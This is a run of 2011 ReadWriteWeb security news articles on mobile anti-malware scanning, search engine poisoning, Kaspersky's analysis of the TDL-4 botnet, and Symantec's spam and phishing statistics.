As iOS devices make their way into the enterprise, they become a new attack vector for malware pushers looking to gain hooks into the network. An increasing amount of malware is also being pushed through a tactic known as spear-phishing (or whale-phishing in the case of top-level executives) that targets a specific group of people.

[Image: Intego_VirusBarrier.jpg]

Employees often check their email from mobile devices like iPads and iPhones, and spreading malware through the enterprise could be only a matter of plugging that phone into a computer or forwarding a malicious email to a colleague.

VirusBarrier follows the trend set by other security companies such as Symantec and Lookout in mobile security by running scans in the cloud. Anti-malware applications are computing intensive and take up storage space, which is not practical for mobile devices running flash memory on limited processors. Hence, Intego sends security scans from the mobile device into the cloud, where attachments are scanned against the company's database of malware definitions. Using the cloud gives applications access to security companies' vast libraries of malware definitions without consuming the limited resources available on tablets or smartphones.

The average user who does not get a lot of email probably does not have much use for an app like VirusBarrier. Yet, for power users checking their email all day and connecting with lots of people through their iPhones, it is a useful application to have around. It is available in the App Store for $2.99, which includes a 12-month subscription to Intego's malware dictionary.

http://www.readwriteweb.com/archives/security_app_aims_to_keep_malware_from_spreading_t.php Security Tue, 12 Jul 2011 14:00:00 -0800 Dan Rowinski
Search Engine Poisoning #1 Vector for Malware

Search engine poisoning is the most prevalent form of malware delivery on the Web, according to the security researchers at Blue Coat. In its 2011 Mid-Year Security Report, Blue Coat outlined the biggest threats to Web security and the attack vectors that malware providers are using to infiltrate users' computers.

Search engine poisoning (SEP) makes up 40% of malware delivery vectors on the Web. In this practice, malware and spam attackers inundate search results with links to bait pages that take users to malicious websites, which then download malware to the computer. Spammers climb the search rankings by creating link farms that push their poisoned pages further up the results. People want to be able to trust that what they search for in Google, Bing or Yahoo is safe to click on. Users are not conditioned to think that search results could be harmful to the health of their computers. The other leading attack vectors on the Web all pale in comparison to SEP, with malvertising, email, porn and social networking each accounting for less than 10% of malware delivery.

The Dominance of SEP

Google and the security companies are in a giant game of whack-a-mole with the malware creators, said Chris Larsen, head of Blue Coat's malware research team. The botnet networks that create malware are constantly shifting and their delivery mechanisms grow ever more sophisticated.

Yet, SEP attacks do not fundamentally change; they just evolve. As an example, Larsen points to the killing of Osama Bin Laden and the mass of searches that followed the day after the announcement was made to the world. The malware creators used their existing infrastructure, changed the signatures of the command-and-control servers and unleashed a mass of bait links onto the Web.

Malware attackers have come to recognize that users are more wary of clicking on suspicious links that promise something unbelievable or outrageous. So, the vector is shifting to image search. Images are much harder to guard against and have proven to be fertile soil for malware providers. It is harder for Google and the security companies to find the "link farm" that creates the poisoned search results in images.

Porn, Malvertising and Email Remain Strong

[Image: Blue_Coat_Malware_Vectors.jpg]

In the table above, "unrated" includes malvertising, the practice of poisoning ads on the Web so that they lead to "bait pages" in much the same way as SEP does. The Blue Coat report notes that "people like to look at other people and human nature is unlikely to change." There have been spikes of up to 11,000 new porn sites a day, which makes the need for real-time Web defense systems paramount. Yet, porn as a delivery vector has actually fallen in Blue Coat's rankings, slipping behind email since the last report the company issued in February. Symantec reported last week that email spam was at one of its lowest levels since 2008, so it looks like the overall amount of malware on the Web may be decreasing.

Larsen cautions that this might not be the case. Malware vectors are cyclical by nature. The changing nature of botnets makes it difficult to determine exactly how much malware is being driven from which sources. Botnets are becoming more difficult to identify and are increasingly sharing (or simply overlapping) resources. On one hand, the more sophisticated the botnet, the harder it is to dismantle. Yet, Larsen thinks that the more complex botnets become, the more vulnerable they become.

The Changing of Botnets

"The network is constantly changing," Larsen said. "The bigger the attack surface, the more vulnerabilities are created in their own networks."

[Image: Blue_Coat_Unique_Botnets.jpg]

The Web is a large, complex place made up of many different standards and approaches. Hackers take advantage of this complexity by exploiting weaknesses in portals that are not secure. Larsen thinks that the more complex botnets become, the more portals open up through which security companies can worm into the networks and take them down.

Botnets are also beginning to share nodes on their networks. According to the report: "Many botnets are known to intersect and share their compromised nodes in a symbiotic relationship (which they do with more monetizable malware such as ransomware, pharmacy spam, scams and a variety of other exploits). The samples analyzed, sandboxed, researched and studied by Blue Coat Security Labs exhibit this characteristic."

In terms of malvertising, attackers are learning that patience pays. A malvertising network will lie low within a legitimate ad network and build a clean reputation by passing multiple malware security sweeps. When the sleeping malvertising network awakes, it changes how it operates and delivers users to a malware host. The next day the malvertising network is gone, hiding somewhere else on the Internet.

http://www.readwriteweb.com/archives/search_engine_poisoning_1_vector_for_malware.php Security Wed, 06 Jul 2011 07:31:00 -0800 Dan Rowinski
One Botnet to Rule Them All: Kaspersky Labs Finds "Indestructible" Network Every time a botnet is taken down, another is waiting in the wings to take its place. Each successive iteration of malware-infected networked computers is more sophisticated than the last. Security research company Kaspersky believes it has found one that is almost indestructible.

The TDL-4 botnet is 4.5 million PCs strong. It has some unique features that make it difficult to remove, such as a powerful rootkit and the ability to disable other malware installed on a computer. Those features make the malware difficult to detect and remove, but that is not what makes the botnet indestructible. The way TDL-4 communicates with its command-and-control center and other infected computers is what makes it unique.

Using Encryption to Hide

Users usually think that using encryption to transfer data and messages on the Internet is a good thing. In general, it is (despite the headaches associated with implementing and maintaining HTTPS). TDL-4 turns encryption against security defenders by swapping the table created for outgoing HTTP requests and eventually converting the request to HTTPS, using Secure Sockets Layer (SSL) to connect to the command-and-control server.

Here is how the Kaspersky team describes the process:

"This table is activated with two keys: the domain name of the botnet command and control server, and the bsh parameter. The source request is encrypted and then converted to base64. Random strings in base64 are prepended and appended to the received message. Once ready, the request is sent to the server using HTTPS."

Here is Kaspersky's breakdown of the 4.5 million infected computers:

[Image: TDL-4_Dispersion.jpg]

Essentially, TDL-4 uses peer-to-peer networking, which lets it hide the command-and-control center and also move the server so that it has no single, centrally identifiable location. It encrypts the P2P communication, making it nearly impossible to track.

The Malware That Kills Malware

In the wild, only the strong survive. TDL-4 recognizes that it is stronger than its competitors, but also that its competitors' behavior increases the risk of detection.

Botnet malware doesn't want the user to know that it is hiding on the hard drive. That means burrowing deep into the kernel as a rootkit and tricking the rest of the system into believing that everything is fine. Yet, less sophisticated malware leaves tell-tale signs that it has infected a user's device, such as unusual packet bursts, slowing of the machine and general odd performance issues.

So, TDL-4 kills the competing malware. The malware is a bootkit that accesses a computer's MBR (master boot record). It does this to hide from security programs and extend the lifespan of the malware. The TDL-4 code, known as TDSS, can delete the most common viruses found on a computer, such as Zeus. It then downloads its own malware, such as "fake antivirus programs, adware and the Pushdo spambot," according to Kaspersky.

Unique Behavior

P2P botnets are on the rise, and their evolution is making it harder to track and destroy the networks. TDL-4 uses a unique method: it uses the public KAD P2P network to send and receive queries. This helps the botnet stay decentralized while also acquiring new devices that are using KAD to share files and applications.

TDSS also works to "poison" search engine results and advertising networks, creating proxy affiliates that can help download the malware to computers. We will have more on malware using P2P and "search engine poisoning" next week.

http://www.readwriteweb.com/archives/one_botnet_to_rule_them_all_kaspersky_labs_finds_i.php Security Thu, 30 Jun 2011 09:16:00 -0800 Dan Rowinski
Spam Hits Lowest Levels Since 2008 (Did You Notice?)

A new report from security company Symantec says that global spam is at its lowest level since 2008. The geographic center of spammed accounts has also shifted from Russia to Saudi Arabia. Worldwide, spam is now down to one in every 1.37 emails. In the United States, spam accounts for 73.7% of all emails.

Spam levels are now the lowest they have been since McColo, a California-based ISP that served as a spam control center, was taken down in 2008. That is, in part, due to the shutdown of the spam-sending botnet Rustock in March 2011. Spam, phishing, viruses and other types of malware are all still major problems in the Internet ecosystem, but it looks like progress is being made against the botnets and those who control them.

Symantec's Intelligence Report is a combination of analysis from the Symantec.cloud MessageLabs Report and the monthly Symantec State of Spam and Phishing Report. It is the first time the company has combined the two reports.

One of the most interesting trends to emerge from the June 2011 report is that pharmaceutical spam is declining while the prefix "wiki" is increasingly common in spam messages. In some cases, the two have merged, such as the WikiPharmacy to which spam messages are directing users. Other major spam themes have been tax returns in India and fake aid to Japan after its catastrophic earthquake and tsunami in March. After pharmaceutical spam (which accounts for 40% of all spam messages), adult/sex/dating was the next highest category, with 19% of all messages.

The United States is also no longer a major generator of spam. Spam messages originating from the U.S. declined from 10.7% of all spam in 2010 to 2.8% in June 2011.

Spam may be at its lowest levels in three-plus years, but that does not mean it is dying out or is not a major problem. In June there were still 39.2 billion spam messages sent.

[Image: symantec_spam_rate_june11.jpg]

Phishing Evolves, Grows More Targeted

Email phishing is becoming more targeted. Spammers are now using tactics known as "spear phishing" and "whale phishing" designed specifically for a small set of users.

Our enterprise editor, David Strom, reports from Symantec's headquarters in Mountain View, Calif.

"The report shows that virus authors are getting better at micro-targeting: 75% of the malware has infected 50 or fewer individual PCs. One virus assembly kit called Harakit is distributed to an average of 1.6 users, meaning that it is used to deliver custom-built attacks that are targeted at a specific individual."

Examples such as Harakit might fit with "whale phishing," where specific, high-ranking executives are targeted with phishing emails that have been dutifully researched by the phishers and are crafted to get into the executive's computer, which often has access to far more data than a mid-level employee's.

South Africa is the most targeted location for phishing attacks, with one in every 111.7 emails. The U.S. sees a phishing attempt in every 1,270 emails, while Japan sees hardly any (in comparison) at all, with one in 11,179 emails.

[Image: syantec_phishing_june2011.jpg]

Web-based malware is on the rise. MessageLabs identified an average of 5,415 sites each day harboring malware, adware and spyware, an increase of 70.8% from May 2011. That increases the chances of "drive-by" downloads where a user visits a site and becomes infected with malware.

[Image: symantec_virus_june2011.jpg]

http://www.readwriteweb.com/archives/spam_hits_lowest_levels_since_2008_did_you_notice.php Security Tue, 28 Jun 2011 12:01:00 -0800 Dan Rowinski